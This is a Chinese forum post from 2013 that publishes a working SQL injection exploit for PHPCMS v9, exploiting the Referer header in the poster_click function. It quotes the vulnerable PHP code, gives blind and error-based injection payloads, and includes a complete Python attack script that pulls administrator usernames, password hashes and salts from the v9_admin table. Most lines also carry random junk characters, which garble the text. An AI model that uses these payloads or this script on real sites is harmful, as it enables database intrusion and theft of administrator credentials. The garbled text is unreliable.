有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:( i) h% {3 F& h* g* c* S
3 v, n6 h( ^" N问题函数\phpcms\modules\poster\index.php
5 l) h( I2 T" s- U% y! Z& E5 u5 K' Y! ^1 H' P" M6 k; _ o7 L
public function poster_click() {# `" A& w* O& \0 X* j+ H
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
3 m: a! T( a9 R$r = $this->db->get_one(array('id'=>$id));! [* m8 o# y. q5 X
if (!is_array($r) && empty($r)) return false;
% e! u2 R8 g$ n. y# e$ip_area = pc_base::load_sys_class('ip_area');& s E2 P+ _4 v
$ip = ip();
3 |; m7 D+ @; A$area = $ip_area->get($ip);* D$ }5 O( H, @9 w! B
$username = param::get_cookie('username') ? param::get_cookie('username') : '';
1 M! Q( r I9 z4 ~( ?if($id) {
0 |8 d! J5 B$ A. {2 R4 E$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();! Q, K' Z( f3 N2 X' [
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
8 D, ^4 D+ i5 [3 U. C; R/ Q}( B, | d4 O: x
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));/ L0 K8 h& k" k- l9 }6 t
$setting = string2array($r['setting']);
" W2 j/ N' L- ?if (count($setting)==1) {7 I$ g- N6 ?- ?8 G. Z2 ? ^
$url = $setting['1']['linkurl'];+ J2 v1 T! h0 i# a# k
} else {
/ F5 D" Z+ e& Z) B' P+ O4 \$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
. W g9 I. c. f5 `}
% Y. B+ x" C* Eheader('Location: '.$url);
# f- R! Y! B2 Z* y# g}- ~& |" [* E% b* |8 s$ u
5 C Q4 X7 _: T; I& `7 |& a8 e/ R' G
% i( j# T6 }: Q5 e: s1 y% U
+ V6 C7 ~' ]- }2 u% H# k利用方式:; ?' ^9 r/ t' U# { _8 G
# C+ F% Z# ?4 |, R( v% K- u) f. r$ W1、可以采用盲注入的手法:
9 ~7 _5 \2 ^3 C8 N, N7 m! k" x' r, l9 {% b
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
v2 a& n$ @9 g2 z* W9 r6 U3 r/ e: R( Z' O1 s4 n$ D
通过返回页面,正常与否一个个猜解密码字段。- \9 S3 B2 g: Z) a* @% s* J
F! J6 o$ W) R- Y2、代码是花开写的,随手附上了:/ z `9 @7 ^. F9 |, {& s8 I* v
4 |$ t' O" Z+ A) s. v1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)# j5 l! P7 O0 }1 ]9 N% P
- x7 U; \$ U$ n, F: U' X6 Y9 A
此方法是爆错注入手法,原理自查。! L+ v' p/ G+ k. c2 p+ K, g7 B
) g; b5 I; V' Q: w+ S5 o
4 T( j6 L" }) F. @
- Y) p/ p+ V9 n* \4 B
利用程序:* O4 O- M2 ?. e! G" N5 P2 f, M6 g6 h
3 o* }7 j6 _" c; h#!/usr/bin/env python) D7 V1 F/ `' L$ v' @
import httplib,sys,re: _' t) i. L- ~ L( Q0 ~
) w% ~2 Y3 E" @* b" _* {def attack():) u# l7 u; X4 O+ d+ I
print “Code by Pax.Mac Team conqu3r!”8 z9 A/ i; S: t0 w9 s
print “Welcome to our zone!!!”
/ X S/ x( d& p5 R2 |0 w: burl=sys.argv[1]
+ h4 x3 ?# ?& W& Y1 A* rpaths=sys.argv[2]
4 _) p: f$ \- f5 b1 Bconn = httplib.HTTPConnection(url)
6 x+ b2 l. N/ z7 Ii_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,6 b, X9 b* {1 F$ b( }) z! J- e
“Accept”: “text/plain”,, k$ _. ~5 w& r7 |/ b
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}' G- `; |: b0 E: [2 U4 B
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
& b( k0 W* M" p/ zr1 = conn.getresponse()+ f5 H1 Y, k# |. ?# F# y
datas=r1.read()
4 e( k/ f- s3 i8 K1 T5 U1 ^datas=re.findall(r”Duplicate entry \’\w+’”, datas)' h8 z- Q9 ]) q/ u: _5 N$ b7 k
print datas[0]
W7 T; F* i0 @* G5 I4 g* L2 ]% Lconn.close()
/ o3 v; U$ b9 B& u2 y+ m. tif __name__==”__main__”:
0 O8 F+ W! W% A+ M( d' E3 ^if len(sys.argv)<3:$ D4 P3 C: [: F6 {
print “Code by Pax.Mac Team conqu3r”
$ ~5 \ T0 s0 N9 W+ G" ?print “Usgae:”
4 E* m) W, c& c8 `4 u9 {4 } Sprint “ phpcmsattack.py www.paxmac.org /”
* `- k9 X1 C' ?. f/ t! Q) j8 d; ~print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”% O7 S. }9 m0 }0 _, I( \9 W
sys.exit(1)
/ S. t; H, K' W- yattack()
2 u9 `* Q0 j; Q g4 E% h) Q, o
, ?5 Z! m/ ~9 j {+ ?, g |
发表于 2013-1-11 21:01:00
收藏
支持
反对